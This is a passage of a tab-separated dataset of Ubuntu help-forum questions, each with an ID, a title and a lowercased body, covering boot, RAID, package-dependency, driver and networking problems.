310941	what are the packages needed for boost headers ?	i 'm trying to install gearmand ( from source ) and i need the boost headers version > = 1.39 . for this i installed libboost1.49-dev , libboost-program-options1.49.0 , uuid-dev and other dependencies . is there any other package that needs to be installed also ? because each time i run ./configure to prepare gearmand it keeps telling me that it needs boost headers version > = 1.39 . i do n't know why it does n't find the headers , since the /usr/includes/boost/ directory exists . what am i missing ?
310943	how to replace the background image in the default plymouth theme	is it possible to replace the pink purple colour of ubuntu 's default plymouth theme with an image ?
310944	unable to boot windows after installing ubuntu 12.10	i have just installed ubuntu 12.10 on my pc and the installation completed well . but now the problem is i am unable to boot windows 8 , in grub menu it shows both options , if i choose ubuntu , it boots smoothly and if i choose windows 8 it shows the following message : error : device format `` ldm/958e9087-d9d5-11e2-be71-0024d7280798/volume1 '' invalid : must be ( f|h ) dn , with 0 < = n < 128 press any key to continue ... and after some seconds ... it shows : a disk read error press ctrl+alt+del to restart .
310947	computer does n't restart while installation	laptop : hp envy 6-1002tx ubuntu version : 13.04 & 11.04 while installation computer does n't restart and is stuck on a purple screen . i had used the same pen drive for installing ubuntu on an other dell laptop and it worked fine , so i think nothing is wrong with the pen drive . my first two partitions are for windows and i have three logical drives as '/boot ' , '/ ' and 'swap ' . i have the usb drive checked for errors . legacy mode is enable & secure boot disabled . and if i forcefully shut down the pc after installation and boot it back it loads windows , and there is no menu to select ubuntu ( assuming ubuntu installed properly , which i doubt ) i then used easybcd to add an entry for ubuntu but when i boot into ubuntu using this forced entry a black screen appears with the following written on it : grub4dos 0.4.5c ... ... minimal bash-like editing is supported ... . and a cursor blinking so is ubuntu installed or not ? if yes , why is it not working ? and if it is not installed properly , what should i do now ? updates : i even tried to install the graphic drivers while in the live usb mode and install ubuntu . but it wo n't install .
310950	broadband gets connected but ca n't browse anything further google !	i have a dell inspiron 3520 with ubuntu 12.10 installed . my bsnl broadband gets connected ( both wired and wireless ) but i have n't been able to access anything except google . same problem i had with xubuntu 13.04 before i installed ubuntu 12.10 . broadband works fine on windows 7 . please help .
310951	mounted ntfs partition without trash	right now i 'm testing ubuntu 13.04 64bits , i installed it inside windows 7 originally i had my hdd partitioned ( 2gb swap , 78gb os , 346gb , as a warehouse ) so my temp ubuntu is instaled on the c : partition 78gb , the d : '' warehouse '' partition is mounted on `` /mnt/warehouse '' , i noticed that if i want to delete something , it delete the file without passing through the trash , or bin recycler . i think that i have to edit the fstab file , to enable the .trash functionality , right ? how i have to do to change the root permission in the fstab file ? this is how it is set now : uuid=9214f67714f65da3 /mnt/warehouse ntfs nosuid , nodev , nofail , x-gvfs-show , x-gvfs-name=warehouse 0 0 and this is how it was set in my previous ubuntu installation ( 11.04 ) : uuid= '' 9214f67714f65da3 /media/warehouse ntfs exec , defaults , uid=1000 , gid=1000 0 0 but this is wrong , ca n't mount the partition , i do n't get where is the error . i 'm kind new in linux , so .. i 'm lost here .
310960	how to use skype with empathy in 13.04 ?	i want to add my skype account to empathy to chat with all my contacts from there . i tried the following to integrate skype with empathy on ubuntu 13.04 , using this tutorial from ubuntuusers . sudo apt-get install pidgin-skype restart empathy empathy-accounts but in empathy-accounts , which loads very slow , i do n't see skype to select . how can i integrate skype with empathy on ubuntu 13.04 ?
310961	ubuntu mobile operating system	is there any way to install ubuntu mobile in samsung wave devices ? as you all know , bada is not an open source and it might be hard to get the exact drivers . however , if anyone have any idea about this topic , please replay for this post . thanks and regards
310967	facebook and youtube not working in chrome or firefox	can somebody explain why in my ubuntu 13.04 the facebook site and youtube site ca n't be opened by chrome or firefox . other sites can be opened except for this two site . i really need a hand here . result from ip addr : 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1402 qdisc pfifo_fast state up qlen 1000 link/ether 00:23:18 : a1 : c1:96 brd ff : ff : ff : ff : ff : ff inet 192.168.0.103/24 brd 192.168.0.255 scope global eth0 inet6 fe80 : :223:18ff : fea1 : c196/64 scope link valid_lft forever preferred_lft forever 3 : wlan0 : < broadcast , multicast > mtu 1500 qdisc noop state down qlen 1000 link/ether 40:61:86:9c:18 : cf brd ff : ff : ff : ff : ff : ff victor @ victornolii : ~ $ ping -c 4 youtube.com ping youtube.com ( 120.28.26.50 ) 56 ( 84 ) bytes of data . 64 bytes from 120.28.26.50 : icmp_req=1 ttl=50 time=905 ms 64 bytes from 120.28.26.50 : icmp_req=2 ttl=50 time=2155 ms 64 bytes from 120.28.26.50 : icmp_req=4 ttl=50 time=1796 ms
310969	libreoffice 4 is not working	following error is appearing during installation ... . '' the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:3.5.7 ) but it is not installed '' pls help .
310972	ati radeon 9200 ubuntu 13.04	i recently installed ubuntu 12.04 lts in my old computer and it worked alright until i installed ubuntu 12.10 . i tried updating to 13.04 to see if this fixed it , but unfortunately it did n't , does anyone knows how to make this driver work ? everything seems to be like ten times slower or so on the screen ( everything but the mouse ) ,
310974	how can i install the latest version of evince ?	i have ubuntu 12.04 with evince 3.4.0 . this version of evince has some bugs ( in particular showing patterns ) that are fixed in the version 3.8.0 . does anyone know if there is some repository to have evince up to date ? i would prefer this option ( repository ) but if this can not be done i would accept also a manual installation of the up to date version .
310975	usb stick does not appear automatically in the launcher when entry is given in fstab for noexec option	we tried to mount usb for a limited user , which is not a sudo user . when we give auto mounting , the permissions shown when issuing the mount command are : nosuid , rw , nodev but we want to give noexec option also while mounting a usb stick by the user . so in the fstab we gave the line : /dev/sdb1 /mnt/usb auto auto , nodev , noexec , nosuid , user , rw 0 2 the usb hard drive does not get automatically mounted and icon does n't appear in the launcher also . it can only mount with command mount /mnt/usb . how to automatically mount usb to view it in the launcher for the limited user with noexec option additionally set ? thanks..
310978	shared workstation with ubuntu ?	this is kind of an awkward question but here i go . is it possible to have a shared workstation for two users ? each user would have its own pair of screens , mouse , keyboard etc but each working in its own home directory etc ? is there any server packages combination that would allow this ? otherwise what is the easiest combination of packages to allow wlan network login and running not only shells on the shared box but also development ide like e.g . eclipse ?
310984	libiconv crossplatform usage ?	i 'm trying to make my own tiny string class that takes utf-8 encoded strings from server and converts it to local string encoding , so that it could be easily used with native api functions ( winapi on windows and libc on linux ) . doing it on windows is pretty easy , i 'm storing strings locally as wchar_t ( 2 bytes , utf-16 ) and convert it to/from utf-8 using widechartomultibyte and multibytetowidechar functions . but what about linux/bsd based systems ? i thought that i should store strings as multi/single byte char , and convert to/from utf-8 using libiconv functions . it is said in the documentation that i can use `` char '' argument for local char encoding , but on my ubuntu 13.04 iconv does n't support `` char '' target , but `` wchar_t '' is supported : iconv -- list | grep char wchar_t// i guess utf-8 is a default encoding for ubuntu and for most of the modern linux-based operating systems , but i 'd like to implement utf-8 from/to conversions in the most crossplatform way . maybe it would be better to store strings in wchar_t locally ( it would be 4 byte encoding , like ucs4 or something ) and call wchar_t versions of api functions ? what do you think ?
310989	can not remove contacts	when i add a new contact phone number , email , etc in the contacts app . and i want to remove contacts name , it ca n't deleted and there is not appeared shortcut menu and remove option by right-click . so , i ca n't delete any contacts . how to solve the problem and how to remove them ?
310990	borked encoding in ubuntu 13.04 for slovak language	i 'm having the same issue as described here . a workaround , that does not work , as i got to know here , since ubuntu no longer uses locale.gen , has been suggested in the same thread . can someone advise ?
310996	problem installing vlc	i am new to ubuntu and using ubuntu 13.04 ! its completely new and has no video player that plays avi , flv etc ! i am using my phone to download so can someone help me please to download vlc for ubuntu 13.04 ( site name ) . i try vlc from a friend and it show something like vlc dependency not satisfiable ! help please !
310999	add events to gcal via command line ?	i 'd like to know how to add events to my google calendar via command line . what 's the best way ?
311001	error while mounting partition with live cd	while booting my system , it is going into initramfs prompt and it is giving some error . before taking any further steps , i planned to take a backup my data from hard disk . so , i bootted the system with live cd . when , i trying to mount the partition , i am getting this error . root @ ubuntu : ~ # mount dev/sda1 /mnt/ mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so the following errors are logged in syslog : jun 21 08:10:34 ubuntu kernel : [ 739.053669 ] ata3.01 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 jun 21 08:10:34 ubuntu kernel : [ 739.053675 ] ata3.01 : bmdma stat 0x64 jun 21 08:10:34 ubuntu kernel : [ 739.053680 ] ata3.01 : failed command : read dma ext jun 21 08:10:34 ubuntu kernel : [ 739.053688 ] ata3.01 : cmd 25/00 : f0 : a0 : f5:6f/00:00:18:00:00/f0 tag 0 dma 122880 in jun 21 08:10:34 ubuntu kernel : [ 739.053690 ] res 51/40:00 : af : f5:6f/40:00:18:00:00/10 emask 0x9 ( media error ) jun 21 08:10:34 ubuntu kernel : [ 739.053694 ] ata3.01 : status : { drdy err } jun 21 08:10:34 ubuntu kernel : [ 739.053697 ] ata3.01 : error : { unc } jun 21 08:10:34 ubuntu kernel : [ 739.164130 ] ata3.00 : configured for udma/100 jun 21 08:10:34 ubuntu kernel : [ 739.196323 ] ata3.01 : configured for udma/133 jun 21 08:10:34 ubuntu kernel : [ 739.196345 ] sd 2:0:1:0 : [ sda ] unhandled sense code jun 21 08:10:34 ubuntu kernel : [ 739.196348 ] sd 2:0:1:0 : [ sda ] result : hostbyte=did_ok driverbyte=driver_sense jun 21 08:10:34 ubuntu kernel : [ 739.196353 ] sd 2:0:1:0 : [ sda ] sense key : medium error [ current ] [ descriptor ] jun 21 08:10:34 ubuntu kernel : [ 739.196359 ] descriptor sense data with sense descriptors ( in hex ) : jun 21 08:10:34 ubuntu kernel : [ 739.196362 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 jun 21 08:10:34 ubuntu kernel : [ 739.196376 ] 18 6f f5 af jun 21 08:10:34 ubuntu kernel : [ 739.196382 ] sd 2:0:1:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed jun 21 08:10:34 ubuntu kernel : [ 739.196389 ] sd 2:0:1:0 : [ sda ] cdb : read ( 10 ) : 28 00 18 6f f5 a0 00 00 f0 00 jun 21 08:10:34 ubuntu kernel : [ 739.196403 ] end_request : i/o error , dev sda , sector 409990575 jun 21 08:10:34 ubuntu kernel : [ 739.196418 ] jbd : failed to read block at offset 31637 jun 21 08:10:34 ubuntu kernel : [ 739.196430 ] ata3 : eh complete jun 21 08:10:34 ubuntu kernel : [ 739.197001 ] jbd : recovery failed jun 21 08:10:34 ubuntu kernel : [ 739.197004 ] ext3-fs ( sda1 ) : error loading journal how to take safe backup of my data ? how to fix this issue ?
311005	using synergy between mac os x and ubuntu 13.04	i 'm having problems between mac os x 10.8.3 ( mac mini ) and ubuntu 13.04 ( hp pavilion dm1 laptop ) . the former being the server and the latter , the client . i can not utilise synergy if the hp-dm1 is running ubuntu strangely if i used windows 7 ( via my dual boot ) on the hp-dm1 , the connection for synergy is perfect with the macmini . so here 's the background work i 've done for it . macmini can ping hp ( if hp is on windows 7 ) macmini can not ping hp ( if hp is on ubuntu ) - massive time outs the vice versa also applies to both these cases above . hp on ubuntu pings wireless router ( 192.168.1.1 ) perfectly . hp on windows pings 192.168.1.1 perfectly synergy works ok if i plug hp on ubuntu via a cat6 cable directly to the router ( 192.168.1.1 ) obviously there 's something wrong with the way the wireless card on the hp is communicating . what i do n't understand is why does it only have a problem with the os x running macmini ?
311006	xen vga passthrough reboot domu error	i currently have the following xen setup : xen 4.2.1 kernel 3.8.0-25 , self compiled with xen pci backend include in the kernel amd hd6450 amd hd6850 asrock87z extreme6 icore 4770 ( not k ! ) goal ist to run two windows 7 domu 's . one as htpc , one as working station with vga passthrough to windows 7 domu 's . i have not installes gplpv drivers until now . i did get windows 7 to work with the hd6450 , passthrough as as secondary gpu . when i passthrough the hd6850 ist works after a clean reboot of the host dom0 . but when i reboot the windows 7 domu the display is not comming up again . this is working with the 6450 but not with the 6850 . has anybody encountered a similar problem or has any solution to this problem ? thanks for any help or hints . mario_s
311014	uninstall grub2	i have a hp 650 laptop with windows 8 . i installed ubuntu 13.04 and removed it afterwards . i can get into windows 8 through secure boot , but if i disable secure boot , to run from cd or anything else , it goes straight to a grub screen which asks for commands . i really need to get rid of this bootloader .
311016	ubuntu touch contacts	i have just flashed the current ubuntu touch image ( fri 21 jun ) and almost everything is great but i cant save contacts , this is the one thing standing between me and daily use of ubuntu touch does anyone know what im doing wrong or have any advice ? ( i can make a new contact from scratch and save one from a current conversation but after i click save then back it hasnt saved anything at all )
311018	how to update twidge 1.0.8 form repositories to 1.1.0 from github ?	i would like to install twidge 1.1.0 , but only 1.0.8 is available in repositories and this version is not compatible with new twitter api and it 's not usable anymore . 1.1.0 is available in debian sid , but i heard it 's not a good idea to mix sid with ubuntu stable . i found a git with twidge 1.1.0 , but after compiling setup with ghc i get dozen of lacking dependencies and i 'm lost . does anyone know how to deal with this ?
311022	problem making gmusic plugin to work in rythmbox	i have installed the gmusic plugin for rhythmbox , and i ca n't get it to work on my computer ( i have rhythmbox v2.97 installed ) . i activated the plugin by ticking the checkbox in rhytmbox 's plugin menu , but nothing happens . at every launch i get the following error in the console : error message there are no preferences in the menu plugin for me to edit my password and username , so i guess a part of the problem lies here . any clue on how to fix this ? thanks in advance
311024	raid1 array lost after upgrade from ubuntu 11.10 to 13.04	i had a working ubuntu 11.10 with / on an ssd ( /dev/sdc ) and /home on a software raid1 array that resided on two partitions on /dev/sda and /dev/sdb ( identical drives ) , respectively . this was set up as sw raid . the motherboard 's hw raid is disabled . today , i upgraded from 11.10 to 13.04 using a live cd . i chose the option of upgrading the existing 11.10 and retaining user data . at first , i could not boot after the upgrade . i suspected that the install had failed to update grub properly on sdc , so i first attempted to repair it by booting from the live cd and installing and using boot-repair . this was unable to complete for some unclear reason , so i instead reinstalled grub on sdc manually as described here : http : //www.howtogeek.com/114884/how-to-repair-grub2-when-ubuntu-wont-boot/ . after this , ubuntu 13.04 booted to a text-based login prompt that would not accept the user name and password that i specified during install . i then installed 13.04 from the live cd again , this time choosing to the `` upgrade '' the now existing 13.04 install to 13.04 ( again , the option with retaining user files etc. ) . after this , 13.04 can successfully boot to a graphical login and lets me log in without errors . now , the only remaining problem is , that my raid1 array seems lost : - ( on sda , there used to be ( in this order ) : a 699gb raid member partition approx . 200gb of unallocated space a 109gb ( ext3 or ext4 - do n't remember ) partition holding a backup of a previous ubuntu install . on sdb , there used to be : a 699gb raid member partition an about 100gb ( ext3 or ext4 - do n't remember ) partition holding a backup of my most recent ubuntu install . an about 150gb ( ext3 or ext4 - do n't remember ) partition holding some files . an about 50gb ( ext3 or ext4 - do n't remember ) partition holding some files . examining the disks now , several of the partitions are gone - basically everything on sdb . fdisk -lu now says ( sorry about the danish - i hope you can guess what it means by comparing to fdisk output in your preferred language ) : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 hoveder , 63 sektorer/spor , 121601 cylindre , i alt 1953525168 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 512 byte / 512 byte diskidentifikation : 0x000d9c82 enhed opstart start slut blokke id system /dev/sda1 63 1364496839 682248388+ 0 tom /dev/sda2 * 1740050432 1953519615 106734592 83 linux disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 hoveder , 63 sektorer/spor , 121601 cylindre , i alt 1953525168 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 512 byte / 512 byte diskidentifikation : 0x000bf717 enhed opstart start slut blokke id system /dev/sdb1 1577969664 1869625343 145827840 83 linux /dev/sdb2 1869628635 1953520064 41945715 83 linux /dev/sdb3 1364494336 1577963519 106734592 83 linux /dev/sdb4 63 1364480774 682240356 0 tom partitionstabellens indgange er ikke i diskrækkefølge disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 hoveder , 63 sektorer/spor , 14593 cylindre , i alt 234441648 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 512 byte / 512 byte diskidentifikation : 0x0008fd03 enhed opstart start slut blokke id system /dev/sdc1 * 2048 209295359 104646656 83 linux /dev/sdc2 209297406 234440703 12571649 5 udvidet /dev/sdc5 209297408 234440703 12571648 82 linux swap / solaris disk /dev/mapper/ddf1_raid : 2000.1 gb , 2000131457024 bytes 255 hoveder , 63 sektorer/spor , 243168 cylindre , i alt 3906506752 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 32768 byte / 65536 byte diskidentifikation : 0x000d9c82 enhed opstart start slut blokke id system /dev/mapper/ddf1_raid1 63 1364496839 682248388+ 0 tom partition 1 starter ikke på en fysisk sektorgrænse . /dev/mapper/ddf1_raid2 * 1740050432 1953519615 106734592 83 linux disk /dev/mapper/ddf1_raid1 : 698.6 gb , 698622349824 bytes 255 hoveder , 63 sektorer/spor , 84935 cylindre , i alt 1364496777 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 32768 byte / 65536 byte justeringsforskydning : 512 byte diskidentifikation : 0xbd223da2 disk /dev/mapper/ddf1_raid1 indeholder ikke en gyldig partitionstabel disk /dev/mapper/ddf1_raid2 : 109.3 gb , 109296222208 bytes 255 hoveder , 63 sektorer/spor , 13287 cylindre , i alt 213469184 sektorer enheder = sektorer af 1 * 512 = 512 byte sektorstørrelse ( logisk/fysisk ) : 512 byte / 512 byte i/o-størrelse ( minimum/optimal ) : 32768 byte / 65536 byte diskidentifikation : 0x00000000 disk /dev/mapper/ddf1_raid2 indeholder ikke en gyldig partitionstabel running blkid says : /dev/sda : uuid= '' m- , ^ [ erm-^fm-^ @ % : m- , ^ [ erm-d^ [ erm-\^ [ erm-^ ? m-^ ? m-^ ? m-^ ? '' type= '' ddf_raid_member '' /dev/sdb : uuid= '' m- , ^ [ erm-^fm-^ @ % : m- , ^ [ erm-d^ [ erm-\^ [ erm-^ ? m-^ ? m-^ ? m-^ ? '' type= '' ddf_raid_member '' /dev/sdc1 : uuid= '' 32579810-0388-416d-bb49-7031ac2c2975 '' type= '' ext4 '' /dev/sdc5 : uuid= '' b7507355-effd-4dbc-9b4e-0546bca036f4 '' type= '' swap '' i tried mdadm -- examine /dev/sda and mdadm -- examine /dev/sdb which revealed that the first part of sda and all of sdb appeared to contain raid0 member partitions : /dev/sda : magic : intel raid ism cfg sig . version : 1.0.00 orig family : 43d3cf98 family : 43d3cf98 generation : 00000003 attributes : all supported uuid : 6792b89b : e5162c11 : b694727d : de71f59c checksum : 7a5f4777 correct mpb sectors : 1 disks : 2 raid devices : 1 disk00 serial : wd-wmatv3627263 state : active id : 00000000 usable size : 1953519880 ( 931.51 gib 1000.20 gb ) [ volume0 ] : uuid : 4af84c7c:76a536eb : e16d27fb:1a3a90c3 raid level : 0 members : 2 slots : [ uu ] failed disk : none this slot : 0 array size : 3907039232 ( 1863.02 gib 2000.40 gb ) per dev size : 1953519880 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 30523744 chunk size : 32 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk01 serial : wd-wmatv3628555 state : active id : 00010000 usable size : 1953519880 ( 931.51 gib 1000.20 gb ) /dev/sdb : magic : intel raid ism cfg sig . version : 1.0.00 orig family : 43d3cf98 family : 43d3cf98 generation : 00000003 attributes : all supported uuid : 6792b89b : e5162c11 : b694727d : de71f59c checksum : 7a5f4777 correct mpb sectors : 1 disks : 2 raid devices : 1 disk01 serial : wd-wmatv3628555 state : active id : 00010000 usable size : 1953519880 ( 931.51 gib 1000.20 gb ) [ volume0 ] : uuid : 4af84c7c:76a536eb : e16d27fb:1a3a90c3 raid level : 0 members : 2 slots : [ uu ] failed disk : none this slot : 1 array size : 3907039232 ( 1863.02 gib 2000.40 gb ) per dev size : 1953519880 ( 931.51 gib 1000.20 gb ) sector offset : 0 num stripes : 30523744 chunk size : 32 kib reserved : 0 migrate state : idle map state : normal dirty state : clean disk00 serial : wd-wmatv3627263 state : active id : 00000000 usable size : 1953519880 ( 931.51 gib 1000.20 gb ) i then ran mdadm -- assemble -- scan and now i have a raid0 array . it contains : the three parts mentioned under sda above . unfortunately , neither the 699gb partition here ( which i am hoping still holds one of the copies of my original raid1 array ) or the 109gb partition can be mounted . 1tb of unallocated space which i suppose corresponds to sdb ? can anyone : help me figure out what went wrong ? for example , why did the raid1 members turn into raid0 members ? where have the partitions on sdb gone ? why is the partition type in the partitions on sda lost ? tell me how to fix it ? i can live without the smaller partitions , but i would really , really like to get my home dir from the raid1 partition back .
311026	synaptic package manager problem	i am trying to install ubiquity-frontend-gtk through synaptic package manager but getting following error . i even cant install through terminal sudo apt-get install ubiquity-frontend-gtk returned with following error reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubiquity-frontend-gtk : depends : ubiquity ( = 2.12.14 ) but 2.12.16 is to be installed e : unable to correct problems , you have held broken packages . sudo aptitude install ubiquity-frontend-gtk ( did not work for metoo ) anybody help me plz
311029	`` transport failed '' trying to access iphone filesystem using ifuse	i want to access iphone file system using cli form ubuntu 12.10 i have installed ifuse . but it gives me the error transport failed . how to solve ?
311032	uninstall ubuntu 12.04 , install windows 7 ( legal copy )	alright so i bought my laptop , and i did n't realize that it had ubuntu on it . honestly i 've been having a hard time with this os . always looking for tutos and stuff.. so i decided to dualboot with with windows , turns out it 's also a bit complicated . and seeing that i do n't have much space left on my hard drive , i 'd rather completely uninstall ubuntu and install w7 . can i get a step-by-step tuto please ? thanks ! : )
311034	regular audio corruption when listening to music	i 'm running ubuntu 13.04 ( though the problem was also present under 12.04 ) on an hp pavilion dv7 laptop . every so often , if i change the system volume while listening to music , the sound becomes corrupted - that is to say , random crackly artifacts get interspersed within the audio . if i had to describe it , it 's sort of as if the music had been mixed with the sound that played when connecting to a dial-up connection back in the day - just random , data-sounding clicks and pops , interspersed with sudden ( fraction-of-a-second-long ) mutes . when this happens , some volume levels will mute the sound entirely and become a series of high-pitched crackles ; switching volume back will restore the ( still-corrupted ) sound . this happens in both rhythmbox and audacious , as well as with flash e.g . when watching youtube videos . the problem is very sporadic - sometimes it wo n't happen for a week , sometimes it will happen twice within the same day . the only link is changing the system volume , but there 's no other common element ( no particular volume threshold that always triggers it , say ) . one thing i have noticed is that it happens often if i change the fade slider between front and rear speakers ( the laptop has a subwoofer , which for some reason is seen by ubuntu as the front speaker - so i generally have to pan it slightly towards the rear so as not to have an overabundance of bass - the corruption when changing volume , though , happens when i am using headphones as well as when using the built-in speakers ) closing all applications ( or firefox tabs , in the case of flash ) that are using the sound card in some way and re-opening them fixes the problem . this could possibly be linked to the hdmi port on the laptop ( i do n't use it but have heard things about its less-than-great interactions between this model and ubuntu 's sound drivers ) , or perhaps to the issue where i have to open alsamixer and change the speaker volume to get my headphones to work whenever they are plugged in ; but beyond that i ca n't think of any specific cause or solution for this . let me know if there are any debug outputs that would help figuring out the cause of this issue ( i do n't know for certain what diagnostics i can run for this ) so far i 've identified this happening in : rhythmbox audacious firefox ( w/flash player ) vidyodesktop ( conference calling software ) i 'd be hesitant to say that this is affecting all sound applications , but that could well be the case - it happens so intermittently that it 's difficult to test in specific programs . update : even stranger , over the last couple of days it has ceased to be simply a `` when changing volume '' issue , and sometimes happens simply when changing tracks ( though changing the volume exacerbates it once it 's started ) . i 'm starting to wonder whether it could be some strange interaction between the mp3 codecs and the sound drivers [ i have a dualboot system with music in mp3 format stored on my windows drive ] - though that would n't go any way to explaining why it also happens with flash , so i am utterly stumped .
311035	how to install firefox 20 in ubuntu 12.04	i am using firefox version 21 , but it is too slow and many a time hangs the system . i want to downgrade my firefox to version 20 . please tell me how to install through ppa repository or other method .
311036	unable to update using terminal	i am using ubuntu 12.04 . when i run sudo apt-get update following errors stops me in getting updated the errors as follows : reading package lists ... done w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems so , i had run apt-get update in the terminal it shows me the following : root @ ubuntu : apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? can anyone suggest me what to do with this thing to resolve the issue ?
311037	ubuntu 12.04 overheating my laptop	i use dell inspiron 5520 laptop with latest bios version a13 with 4gb ram and intel core i5 processor . recently i have removed windows 8 and installed ubuntu 12.04 by disabling the uefi mode . since installing ubuntu i found my laptop overheating . help me regarding this issue ! ! i use amd radeon graphic card
311045	installing a program over again using terminal	i 've installed an application using sudo apt-get install ... in terminal . however , i forgot to sudo apt-get update before installation , so an old version of the application was downloaded and installed . i did this procedure over again and the newest version was installed . is this ok or will it cause problems ? what happened to the old version ? was it simply overwritten ?
311046	how to `` uninstall '' plymouth themes	i have been working with custom plymouth themes and have ran into a little confusion . for a reason unclear to me , you have to enter the following : sudo update-alternatives -- install /lib/plymouth/themes/default.plymouth default.plymouth /lib/plymouth/themes/themename/themename.plymouth 100 into the terminal to get the sudo update-alternatives -- config default.plymouth command to recognize your theme and then run the initramfs update . my question is.. what is the safe way to uninstall ( delete ) a theme so that no fatal errors error ? i would just delete the folder but i do n't know if that would mess anything up within the system . any input is appropriated c :
311050	how to restart gpu without reboot ( softreset ) ?	how do i restart the gpu from command line ? using a hp dv6 laptop with ubuntu 12.04-64 and an ati mobile gpu . installed the standard ati propriety drivers suggested by ubuntu . when i close the lid , the computer goes down to suspend mode . when open the lid , everything but the screen resumes again . just black . i 'll guess i have to put a gpu reset script in /etc/pm/sleep.d . but how do i restart/reset the gpu ?
311052	mesa brokes down in ubuntu 13.04 after installing gcc 4.8	i wanted to install gcc 4.8 from 4.7.3 with this following commands : sudo add-apt-repository ppa : ubuntu-toolchain-r/test -y sudo apt-get update sudo apt-get install gcc-4.8-base after that gcc was installed but when i do gcc -- version still have 4.7.3 then i was trying this commands ( do n't know if in this order ) : sudo apt-get clean sudo apt-get -f install sudo apt-get update sudo apt-get upgrade -f after that my opengl version decreased from 3.0 to 2.1 . when doing glxinfo | grep opengl i get : opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd rv770 opengl version string : 2.1 mesa 9.1 opengl shading language version string : 1.30 opengl extensions : i tried to install again mesa 9.1 from source but this did n't work . what happens here ? please help .
311053	how to make ip forwarding permanent ?	i know that i can enable ip forward by echoing 1 to /proc/sys/net/ipv4/ip_forward , but how can i make this permanent ? by the way i want another method rather than start up scripts , is there any ?
311056	how do i find missing dependencies for cinepaint 1.0-4 ubuntu 13.04	i am a photojournalist/digital photo artist and i am getting into video editing projects i have used gimp for my photo editing for years ... i 've been doing some research on other alternatives which may have better quality results and i found cinepaint . i found that there is a lack of .deb packages for installation into ubuntu , so i tried 2 things . 1 ) downloaded from sourceforge the .rpm package and converted it to .deb with alien . it seemed to work/open properly , but i can not get it to open .jpeg , .jpg , .jpeg , .jpg , ot .tiff files ... so i was n't able to make use/test the program ... 2 ) downloaded the .tar.gz from sourceforge and went to compile it ... i first installed the list of dependencies provided in the install file , then i ran : sudo ./configure it seemed to run fine until the end and i got an error output : ================================================================= configuration results gtk cinepaint version 1.0-4 general dependencies : gtk2 toolkit yes 2.24.17 dnd support no littlecms no ! ! cinepaint will not build without ! ! oyranos no plug-ins with external dependencies : python plug-in : no openexr plug-in : yes openexr tiff plug-in : yes png plug-in : yes libpng 1.2.49 jpeg plug-in : yes print plug-in : no fltk dependent plug-ins : no ! ! cinepaint will not build without ! ! thread dependent plug-ins : no ! ! icc examin will not build ! ! flex dependent plug-ins : yes iol ================================================================= configure : error : ! ! ! an error occured ! ! ! please check the above messages to see why . for bug reports please include the complete above output . i 'm very interested in trying this program , but because the error list does n't give specific package names , i 'm not sure how to locate/install the missing dependencies . so i was wondering if anyone knows where to find the missing dependencies or can advise me as to how to locate them myself or has any suggestions about how to get the .rpm -- > .deb conversion to work properly i usually research ubuntu forums/askubuntu/google to see if there is relevant content to my problem before i post a question , however i was unable to find any content relative to ubuntu past 8.04/.10 . i will be grateful for any suggestions or links to documentation relevant to new versions of ubuntu or even a way to 